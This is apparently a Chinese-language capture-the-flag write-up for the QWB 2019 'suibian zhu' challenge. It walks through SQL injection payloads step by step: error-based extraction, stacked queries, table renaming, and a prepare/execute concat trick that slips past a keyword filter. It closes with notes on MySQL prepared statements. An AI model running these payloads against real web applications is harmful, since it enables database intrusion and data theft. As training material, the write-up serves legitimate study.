1' and '0,1' and '1 : 單引號閉合
1' order by 3--+ : 猜字段
1' union select 1,database()# :開始注入,發現正則過濾
1' and extractvalue(0x0a,concat(0x0a,(database())))# :數據庫 :supersqli
0';show databases;# : 嘗試一堆后發現堆疊注入 
0';show tables;#
然后就迷了,怎么從表中得到字段呢?后來查資料才知道,show也是可以查字段的。
0';show columns from words;#
0';show columns from `1919810931114514`;#
好吧接下來菜雞真的懵了,貼一位師傅的WP——強網杯2019隨便注
開始復現
1.將words表改名為word1或其它任意名字 : rename table words to new_word;
2.1919810931114514改名為words : rename table 1919810931114514 to new_19198;
3.將新的word表插入一列,列名為id : alter table new_19198 add id int unsigned not Null auto_increment primary key;
4.將flag列改名為data : alert table new_19198 change flag data varchar(100);
1’;rename table words to new_word;rename table 1919810931114514 to new_19198;alter table new_19198 add id int unsigned not Null auto_increment primary key; alert table new_19198 change flag data varchar(100);#
1' or 1#
欸o(TヘTo)? 涼了?用了師傅的payload也不行,迷啊,但是這種方法很不錯,學學習。
1’;rename table words to word1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#
復現二——BUUCTF-強網杯-隨便注:
1';set @a=concat("sel","ect flag from `1919810931114514`");prepare hello from @a;execute hello;#
1';sEt+@a=concat("sel","ect+flag+from+`1919810931114514`");PRepare+hello+from+@a;execute+hello;#
終於成功了我太難了Orz。
mysql中Prepare、execute、deallocate的使用方法
MySQL 預處理語句prepare、execute、deallocate的使用
MySQL的SQL預處理(Prepared)
PHP MySQL 預處理語句
- PREPARE:准備一條SQL語句,並分配給這條SQL語句一個名字供之后調用
- EXECUTE :執行命令
- DEALLOCATE PREPARE:釋放命令
- 在 SQL 語句中,我們使用了問號 (?),在此我們可以將問號替換為整型,字符串,雙精度浮點型和布爾值。
用法:
PREPARE stmt_name FROM preparable_stmt EXECUTE stmt_name [USING @var_name [, @var_name] ...] {DEALLOCATE | DROP} PREPARE stmt_name
私認為這個就像是函數一樣,prepare准備一個函數的定義,set設定函數的參數,execute傳參執行函數,@a這種就像是變量名一樣,自己用記得釋放。
話說想出這種方法的師傅也也ttql!!!
1 set @a=concat("sel","ect"," group_con","cat(table_n","ame) ","fro","m"," infor","mation_sc","hema.tabl","es"," whe","re tabl","e_","sche","ma=datab","ase()"); 2 3 prepare dump from @a; 4 5 execute dump;
